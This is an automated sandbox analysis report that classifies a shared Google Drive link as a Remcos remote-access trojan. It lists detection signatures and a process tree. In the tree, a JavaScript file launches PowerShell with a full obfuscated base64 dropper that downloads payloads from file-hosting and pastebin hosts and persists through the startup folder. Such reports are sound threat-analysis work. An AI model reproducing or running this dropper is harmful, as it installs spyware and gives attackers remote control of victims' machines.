Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://drive.google.com/file/d/1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s/view?usp=sharing

Overview

General Information

Sample URL:https://drive.google.com/file/d/1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s/view?usp=sharing
Analysis ID:1614057
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Malicious sample detected (through community Yara rule)
Sigma detected: Copy file to startup via Powershell
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1908,i,1253837346360895755,7598481628493044316,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 7156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://drive.google.com/file/d/1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s/view?usp=sharing" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 7588 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • 7zG.exe (PID: 7800 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\F-2025-0855\" -spe -an -ai#7zMap30307:86:7zEvent17416 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • wscript.exe (PID: 8136 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQAcw' + [char]66 + 'XACAAPQAgACgAIAAnAEMAOg' + [char]66 + 'cAFUAcw' + [char]66 + 'lAHIAcw' + [char]66 + 'cACcAIAArACAAWw' + [char]66 + 'FAG4Adg' + [char]66 + 'pAHIAbw' + [char]66 + 'uAG0AZQ' + [char]66 + 'uAHQAXQA6ADoAVQ' + [char]66 + 'zAGUAcg' + [char]66 + 'OAGEAbQ' + [char]66 + 'lACAAKQA7ACQAYg' + [char]66 + 'KAFQAWA' + [char]66 + 'qACAAPQAgACgAIAAkAGYAYg' + [char]66 + 'LAE4AWQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwAgACkAIAA7ACAAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAuAGUAeA' + [char]66 + 'lACAAdw' + [char]66 + '1AHMAYQAuAGUAeA' + [char]66 + 'lACAAJA' + [char]66 + 'iAEoAVA' + [char]66 + 'YAGoAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAZg' + [char]66 + 'WAEQAcw' + [char]66 + 'XACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAYg' + [char]66 + 'hAHMAZQA7AEYAdQ' + [char]66 + 'uAGMAdA' + [char]66 + 'pAG8AbgAgAEIAYQ' + [char]66 + 'zAGUATQ' + [char]66 + '5AHsAOwAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4AC4ARw' + [char]66 + 'lAHQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACkAKQA7AHIAZQ' + [char]66 + '0AHUAcg' + [char]66 + 'uACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAOw' + [char]66 + '9ADsAJA' + [char]66 + 'uAGgAcQ' + [char]66 + '2AHIAIAA9ACAAKAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'wAGEAcw' + [char]66 + '0AGUAYg' + [char]66 + 'pAG4ALg' + [char]66 + 'jAG8AbQAvAHIAYQ' + [char]66 + '3AC8AYg' + [char]66 + 'ZAHIAUg' + [char]66 + 'QAHMANQ' + [char]66 + 'NACcAIAApADsAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdg' + [char]66 + 'mAGoAcg' + [char]66 + 'EACAAPQAgACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKAAgACQAbg' + [char]66 + 'oAHEAdg' + [char]66 + 'yACAAKQAgADsAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACAAPQAgACQAdg' + [char]66 + 'mAGoAcg' + [char]66 + 'EADsAIAAkAHYAZg' + [char]66 + 'qAHIARAAgAD0AIA' + [char]66 + 'CAGEAcw' + [char]66 + 'lAE0AeQA7ACQAdg' + [char]66 + 'mAGoAcg' + [char]66 + 'EACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgACcAVQ' + [char]66 + 'UAEYAOAAnACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQAbA' + [char]66 + '5AGoAaw' + [char]66 + 'HACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwApACAAOwAkAEIASw' + [char]66 + 'yAFMAUgAgAD0AIA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAOwAkAEIASw' + [char]66 + 'yAFMAUgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAG4ARg' + [char]66 + '1AFEARwAgACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAGMAWg' + [char]66 + 'OAHEAZgAgACkAIAA7ACQAbA' + [char]66 + 'EAE0AWA' + [char]66 + 'jACAAPQAgACQAQg' + [char]66 + 'LAHIAUw' + [char]66 + 'SAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAEQAYQ' + [char]66 + '0AGEAKAAgACQAbg' + [char]66 + 'GAHUAUQ' + [char]66 + 'HACAAKQAgADsAJA' + [char]66 + 'TAFgAUg' + [char]66 + 'jAGYAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAuAEcAZQ' + [char]66 + '0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'sAEQATQ' + [char]66 + 'YAGMAKQA7ACQAUw' + [char]66 + 'YAFIAYw' + [char]66 + 'mACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'sAHkAag' + [char]66 + 'rAEcAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAJA' + [char]66 + 'FAHUAVA' + [char]66 + 'aAEEAIAA9ACAAJwAkAHQAZg' + [char]66 + 'ZAEkAbwAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwAnACkAIAA7ACQAcg' + [char]66 + '5AGEAZQ' + [char]66 + 'HACAAPQAgACgARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + '0AGYAWQ' + [char]66 + 'JAG8AIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQARQ' + [char]66 + '1AFQAWg' + [char]66 + '' + [char]66 + 'ACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAEUAdQ' + [char]66 + 'UAFoAQQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAIAApAC4AJwAgADsAJA' + [char]66 + 'FAHUAVA' + [char]66 + 'aAEEAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'FAHUAVA' + [char]66 + 'aAEEAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + '0AHgAdAAuADUAMgAwADIALQ' + [char]66 + 'ZAHoAWAAtAGQAQQ' + [char]66 + 'lAFIAcA' + [char]66 + 'TAC0ATQ' + [char]66 + 'lAFIALw' + [char]66 + 'tAG8AYwAuAHMAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'lAG4Abw' + [char]66 + 'oAHIAZQ' + [char]66 + 'yAHUAZQ' + [char]66 + 'tAGUAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAnACAALAAgACcAJwAlAEQAQw' + [char]66 + 'QAEoAVQAlACcAJwAgACwAIAAgACcAJw' + [char]66 + 'EACAARA' + [char]66 + 'EAGMAOg' + [char]66 + 'cAHcAaQ' + [char]66 + 'uAGQAbw' + [char]66 + '3AHMAXA' + [char]66 + 'tAGkAYw' + [char]66 + 'yAG8Acw' + [char]66 + 'vAGYAdAAuAG4AZQ' + [char]66 + '0AFwAZg' + [char]66 + 'yAGEAbQ' + [char]66 + 'lAHcAbw' + [char]66 + 'yAGsAXA' + [char]66 + '2ADQALgAwAC4AMwAwADMAMQA5AFwAYQ' + [char]66 + 'kAGQAaQ' + [char]66 + 'uAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAMwAyACcAJwAgACkAIAApADsAJwA7ACQAWA' + [char]66 + '2AEMAVA' + [char]66 + 'pACAAPQAgACgAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMwAuAHAAcwAxACcAKQAgADsAJA' + [char]66 + 'FAHUAVA' + [char]66 + 'aAEEAIA' + [char]66 + '8ACAATw' + [char]66 + '1AHQALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lAFAAYQ' + [char]66 + '0AGgAIAAkAFgAdg' + [char]66 + 'DAFQAaQAgACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwAIAAtAEUAeA' + [char]66 + 'lAGMAdQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAFAAbw' + [char]66 + 'sAGkAYw' + [char]66 + '5ACAAQg' + [char]66 + '5AHAAYQ' + [char]66 + 'zAHMAIAAtAEYAaQ' + [char]66 + 'sAGUAIAAkAFgAdg' + [char]66 + 'DAFQAaQAgADsAfQA7AA==';$WgkXZ = $WgkXZ.replace('?','B') ;$WgkXZ = [System.Convert]::FromBase64String( $WgkXZ ) ;;;$WgkXZ = [System.Text.Encoding]::Unicode.GetString( $WgkXZ ) ;$WgkXZ = $WgkXZ.replace('%DCPJU%','C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js') ;powershell $WgkXZ MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
